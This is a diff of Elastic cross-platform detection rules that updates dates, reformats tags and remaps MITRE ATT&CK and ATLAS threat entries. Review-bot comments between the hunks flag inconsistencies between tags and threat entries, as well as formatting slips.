--- a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml
+++ b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml
@@ -3,7 +3,7 @@ creation_date = "2026/02/27"
 maturity = "production"
 min_stack_comments = "ES|QL inline stats became generally available in 9.3.0 and MV_INTERSECTION is in preview since 9.3."
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/27"
 [rule]
 author = ["Elastic"]
@@ -96,3 +96,18 @@ FROM logs-endpoint.alerts-*, logs-endpoint.events.process-* metadata _id, _versi
 | KEEP *
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
+[[rule.threat.technique.subtechnique]]
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
index a4661528dc3..bfb7916cda2
--- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
+++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/04"
 integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -61,7 +61,19 @@ references = [
 risk_score = 73
 rule_id = "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Defend",
+ "Data Source: Auditd Manager",
+ "Data Source: SentinelOne",
+ "Data Source: Sysmon",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -115,16 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1190/"
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml
index 38047bc5492..dbee870beb8
--- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml
+++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature."
 min_stack_version = "9.2.0"
-updated_date = "2026/03/23"
+updated_date = "2025/11/11"
 [rule]
 author = ["Elastic"]
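Review bot: The tags hunk drops `Tactic: Execution` and the second hunk deletes the Execution (T1059) threat entry, but the file keeps the name `initial_access_execution_susp_react_serv_child.toml`, so the path now advertises a tactic the rule no longer maps. Either keep the Execution mapping for a rule that, going by its name, alerts on a suspicious child process, or rename the file when the mapping is intentionally narrowed to Initial Access; I am inferring the rule's behaviour from the file name since the query is outside these hunks.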
@@ -60,7 +60,17 @@ references = [
 risk_score = 21
 rule_id = "483832a8-ffdd-4e11-8e96-e0224f7bda9b"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Use Case: Device Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Use Case: Device Control",
+ "Tactic: Initial Access",
+ "Tactic: Exfiltration",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -71,21 +81,34 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1091"
+name = "Replication Through Removable Media"
+reference = "https://attack.mitre.org/techniques/T1091/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1052"
 name = "Exfiltration Over Physical Medium"
 reference = "https://attack.mitre.org/techniques/T1052/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1052.001"
 name = "Exfiltration over USB"
 reference = "https://attack.mitre.org/techniques/T1052/001/"
+
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["device.serial_number", "host.id"]
diff --git a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml
index 378b3ca7c56..1b1b7304706
--- a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml
+++ b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml
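Review bot: The threat hunk in `initial_access_exfiltration_new_usb_device_mounted.toml` leaves the blank-line separators uneven: the blank between the T1052 technique and its sub-technique is removed, two blanks are inserted before `[rule.threat.tactic]`, one more before `[rule.new_terms]`, and the new Initial Access entry runs straight from its `reference` line into the next `[[rule.threat]]`. Normalise to one blank line between tables, as the rest of the file does. The mapping itself (T1091 Replication Through Removable Media under Initial Access, with the matching `Tactic: Initial Access` tag added in the preceding hunk) is coherent for a device-mount rule.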
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["fortinet_fortigate"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/09"
 
 [rule]
 author = ["Elastic"]
@@ -68,18 +68,13 @@ This rule correlates a FortiGate SSL VPN login with a subsequent security alert
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
 
-[[rule.threat.technique]]
-id = "T1133"
-name = "External Remote Services"
-reference = "https://attack.mitre.org/techniques/T1133/"
 
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+reference = "https://attack.mitre.org/tactics/TA0001/"
\ No newline at end of file
diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml
index 0219cc53c21..4a059992f9c 100644
--- a/rules/cross-platform/initial_access_ollama_api_external_access.toml
+++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/09"
 
 [rule]
 author = ["Elastic"]
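Review bot: The `@@ -68,18 +68,13 @@` hunk rewrites the last `reference` line only to drop the trailing newline (`\ No newline at end of file`); the new side should keep the final newline so the file ends like every other rule file and the next edit to it does not produce a spurious one-line change. Dropping T1133 (External Remote Services) also leaves the VPN-login half of this correlation rule mapped only to T1078 (Valid Accounts), which may be deliberate but is worth confirming, since an SSL VPN is the canonical external remote service and the rule name still keys on that login.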
@@ -51,7 +51,19 @@ references = [
 risk_score = 47
 rule_id = "d8f2a1b3-c4e5-6789-abcd-ef0123456789"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: AI Model Access", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0040", "Mitre Atlas: T0044"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Domain: LLM",
+ "Mitre Atlas: T0040",
+ "Mitre Atlas: T0044",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -77,26 +89,14 @@ network where event.action == "connection_accepted" and
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
+
 
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
-[[rule.threat]]
-framework = "MITRE ATLAS"
-
-[[rule.threat.technique]]
-id = "AML.T0040"
-name = "AI Model Inference API Access"
-reference = "https://atlas.mitre.org/techniques/AML.T0040/"
-
-[rule.threat.tactic]
-id = "AML.TA0000"
-name = "AI Model Access"
-reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
index ae3136dc37d..6772035224b 100644
--- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
+++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2020/09/14"
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
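Review bot: The `@@ -77,26 +89,14 @@` hunk removes the whole MITRE ATLAS threat entry (AML.T0040 under AML.TA0000) while the tag hunk above keeps `"Mitre Atlas: T0040"` and `"Mitre Atlas: T0044"`, so the ATLAS mapping now lives only in free-form tags with no `[[rule.threat]]` entry backing it. If ATLAS entries are not meant to be carried in `rule.threat`, the two `Mitre Atlas:` tags should go as well; if they are, the entry should stay, which also matches the accompanying test change that keys duplicate-tactic detection on `(framework, tactic.name)` precisely so ATT&CK and ATLAS entries can coexist. Either way the tags and the threat block should describe the same set of frameworks.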
@@ -70,3 +70,16 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as
 - Coordinate with the communications team to prepare a response plan for any potential public relations issues arising from the incident, ensuring clear and consistent messaging."""
 
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
index 6f18ddb3bfa..c6700035c99 100644
--- a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
+++ b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2025/12/31"
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/16"
 
 [rule]
 
@@ -27,7 +27,7 @@ If you are using **Elastic Defend**, ensure host IP collection is enabled by fol
 [helper guide](https://www.elastic.co/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint#host-fields).
 """
 severity = "high"
-tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Lateral Movement", "Resources: Investigation Guide"]
+tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 
@@ -111,15 +111,3 @@ The detection rule uses alert data to determine when multiple alerts from differ
 - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign."""
 
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
index 4725b801ac1..56a10ffcee4 100644
--- a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
+++ b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["endpoint", "checkpoint_email"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/15"
 
 [rule]
 author = ["Elastic"]
@@ -18,7 +18,15 @@ name = "Elastic Defend and Email Alerts Correlation"
 risk_score = 73
 rule_id = "c562a800-cf97-464e-9d6f-84db91e86e10"
 severity = "high"
-tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Check Point Harmony Email & Collaboration", "Domain: Email", "Domain: Endpoint"]
+tags = [
+ "Use Case: Threat Detection",
+ "Rule Type: Higher-Order Rule",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Check Point Harmony Email & Collaboration",
+ "Domain: Email",
+ "Domain: Endpoint"
+]
 timestamp_override = "event.ingested"
 type = "esql"
 
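Review bot: The rebuilt `tags` array in the `@@ -18,7 +18,15 @@` hunk has no trailing comma after `"Domain: Endpoint"`, unlike every other multi-line `tags` array in this change. Adding it (`+ "Domain: Endpoint",`) keeps the formatting consistent and means a later tag appended to this list produces a one-line diff instead of two.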
@@ -74,16 +82,3 @@ This rule correlates any Elastic Defend alert with an email security related ale
 - Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.
 - Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.
 - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign."""
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
index 5e2d9eb2fd5..03f1778d43d 100644
--- a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
+++ b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
@@ -3,7 +3,7 @@ creation_date = "2026/02/03"
 maturity = "production"
 min_stack_comments = "ES|QL COMPLETION command requires Elastic Managed LLM (gp-llm-v2) available in 9.3.0+"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/20"
 
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,14 @@ following the [LLM connector documentation](https://www.elastic.co/docs/explore-
 and update the `inference_id` parameter in the query to reference your configured connector.
 """
 severity = "critical"
-tags = ["Domain: Identity", "Domain: LLM", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"]
+tags = [
+ "Domain: Identity",
+ "Domain: LLM",
+ "Use Case: Threat Detection",
+ "Use Case: Identity and Access Audit",
+ "Resources: Investigation Guide",
+ "Rule Type: Higher-Order Rule",
+]
 timestamp_override = "event.ingested"
 type = "esql"
 
@@ -152,15 +159,3 @@ from .alerts-security.* METADATA _id, _version, _index
 | keep user.name, user.id, user.email, host.name, message, event.reason, event.outcome, event.category, event.action, Esql.*
 '''
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
index 61bc47503c2..6d27f7fa239 100644
--- a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
+++ b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/22"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/23"
 
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,16 @@ SSH authorized_keys files are crucial for secure, password-less authentication,
 risk_score = 47
 rule_id = "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Lateral Movement",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -95,6 +104,35 @@ reference = "https://attack.mitre.org/techniques/T1098/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+[[rule.threat.technique]]
+id = "T1563"
+name = "Remote Service Session Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1563.001"
+name = "SSH Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/001/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.executable"]
diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
index d85ff3962b0..e71c50e44c1 100644
--- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml
+++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 
 [rule]
 author = ["Elastic"]
@@ -52,7 +52,21 @@ This rule flags web requests whose URLs embed command-execution payloads—inter
 risk_score = 21
 rule_id = "f3ac6734-7e52-4a0d-90b7-6847bf4308f2"
 severity = "low"
-tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Web",
+ "Use Case: Threat Detection",
+ "Tactic: Reconnaissance",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Credential Access",
+ "Tactic: Command and Control",
+ "Data Source: Nginx",
+ "Data Source: Apache",
+ "Data Source: Apache Tomcat",
+ "Data Source: IIS",
+ "Data Source: Traefik",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -144,14 +158,19 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
+id = "T1505"
+name = "Server Software Component"
+reference = "https://attack.mitre.org/techniques/T1505/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1505.003"
+name = "Web Shell"
+reference = "https://attack.mitre.org/techniques/T1505/003/"
 
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
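Review bot: `"Tactic: Credential Access"` is added to `tags` in the `@@ -52,7 +52,21 @@` hunk, but none of this file's threat hunks add a Credential Access entry: the `@@ -144,14 +158,19 @@` hunk swaps Initial Access for Persistence (T1505.003), and the next hunk adds T1059.004 under Execution, T1071 under Command and Control and T1595 under Reconnaissance, so the other four `Tactic:` tags are each backed by a `[[rule.threat]]` entry while this one is not. Either add the intended technique under a `TA0006` entry or drop the tag; the tag/threat consistency check in this series' test changes would report an ATT&CK tactic tag with no matching threat entry. An entry earlier in the file would not show in these hunks, so this is worth a quick check of the full file before changing it.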
@@ -161,7 +180,48 @@ id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1595.002"
+name = "Vulnerability Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1595.003"
+name = "Wordlist Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/003/"
+
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
index 34ef2593638..1aa962b8f7f 100644
--- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
+++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -19,7 +19,15 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan
 risk_score = 73
 rule_id = "76152ca1-71d0-4003-9e37-0983e12832da"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -61,38 +69,22 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if the threat has spread to other systems.
 - Implement additional logging and alerting for changes to the sudoers file and other critical configuration files to enhance detection of similar threats in the future."""
 
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.003"
 name = "Sudo and Sudo Caching"
 reference = "https://attack.mitre.org/techniques/T1548/003/"
+
+
 
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.003"
-name = "Sudo and Sudo Caching"
-reference = "https://attack.mitre.org/techniques/T1548/003/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
index 967af209153..0c3fbef2c2e 100644
--- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
+++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/23"
 
 [rule]
 author = ["Elastic"]
@@ -57,7 +57,15 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan
 risk_score = 21
 rule_id = "8a1b0278-0f9a-487d-96bd-d4833298e87a"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -99,17 +107,7 @@ reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.001"
-name = "Setuid and Setgid"
-reference = "https://attack.mitre.org/techniques/T1548/001/"
-
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml
index 2d7f9b35b02..d94587dd5b0 100644
--- a/rules/cross-platform/privilege_escalation_trap_execution.toml
+++ b/rules/cross-platform/privilege_escalation_trap_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/24"
 integration = ["endpoint", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/12"
 
 [rule]
 author = ["Elastic"]
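Review bot: The `@@ -99,17 +107,7 @@` hunk turns the second `[[rule.threat]]` entry into a tactic-only entry (`TA0003` Persistence) with no `[[rule.threat.technique]]`, while the tag hunk above leaves only `"Tactic: Privilege Escalation"` in `tags`, so the Persistence tactic now has neither a technique nor a `Tactic: Persistence` tag. If a Persistence mapping is intended for setuid/setgid bit changes, the entry needs a technique under that tactic and a matching tag; if it is not, the empty entry should be removed rather than left as a bare tactic. As written, the tags and the threat mapping disagree, which the tag/threat check in this series' test changes would surface as a missing `Tactic:` tag.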
@@ -49,7 +49,17 @@ This rule flags use of the shell built-in trap to bind commands to POSIX signals
 risk_score = 21
 rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -71,6 +81,6 @@ name = "Trap"
 reference = "https://attack.mitre.org/techniques/T1546/005/"
 
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
